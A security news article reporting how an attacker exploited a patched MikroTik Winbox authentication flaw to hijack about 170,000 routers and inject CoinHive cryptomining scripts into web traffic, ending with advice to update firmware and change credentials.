A hacker has managed to compromise more than 170,000 routers made by MikroTik and uses them to inject browser-based cryptomining scripts into legitimate websites visited by users.
According to Simon Kenin, a researcher a Trustwave who spotted and investigated the attack, the hacker is breaking into routers by exploiting a vulnerability that MikroTik patched Apr. 23.
The flaw allows remote users to connect to MikroTik devices using a special management utility called Winbox and to bypass authentication. They can then download configuration files and decrypt the username and password for the administrative account, gaining full control.
In the attack investigated by Kenin, the attacker abuses MikroTik’s web proxy functionality to inject CoinHive cryptomining software into websites accessed by users who access the internet through networks served by the compromised routers.
MikroTik is a Latvian company that makes consumer and enterprise-grade routers and wireless networking devices. Its equipment is used by home users, companies, government agencies and ISPs around the world.
Even though CoinHive’s creators market the service as a legitimate way for website owners to earn money, it is also frequently abused by hackers who inject the script along with their private key into other people’s websites without authorization.
Kenin found that a script with a particular CoinHive “sitekey” was being injected into web traffic by around 70,000 MikroTik routers, mostly from Brazil. However, the attack later expanded internationally and now affects more than 170,000 routers.
In some cases, the script is only injected into error pages. But in others, it’s injected into every single web page opened by users. Some users had their home or business routers hacked, but other injections are done through ISP routers and affect larger populations.
Kenin also found a website that served the CoinHive script and the attacker’s unique sitekey even when it was accessed from networks that didn’t use MikroTik routers. It turned out that the web server hosting the site was itself behind a compromised MikroTik router, so the attack works in both directions: It affects users behind MikroTik routers when they access websites on the internet, and internet users when they access websites hosted behind MikroTik routers.
“Let me emphasize how bad this attack is,” Kenin said in a blog post. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices. There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily.”
This means that even if the attacker restricts his injections to error pages, he would still potentially get millions of daily loads of his CoinHive script and sitekey.
This attack highlights how important it is to keep router firmware updated and why such devices are an increasingly attractive target for hackers. Cybercriminals can use compromised routers to launch distributed denial-of-service (DDoS) attacks, spy on users’ web traffic and steal credentials, redirect users to phishing pages when they attempt to visit legitimate websites, attack other devices on their local network and, as seen in this case, hijack users’ browsers and computing resources for cryptomining.
If you have a MikroTik router that you haven’t updated, please do so as soon as possible. It’s also a good idea to reconfigure it and change the usernames and passwords for all of its accounts.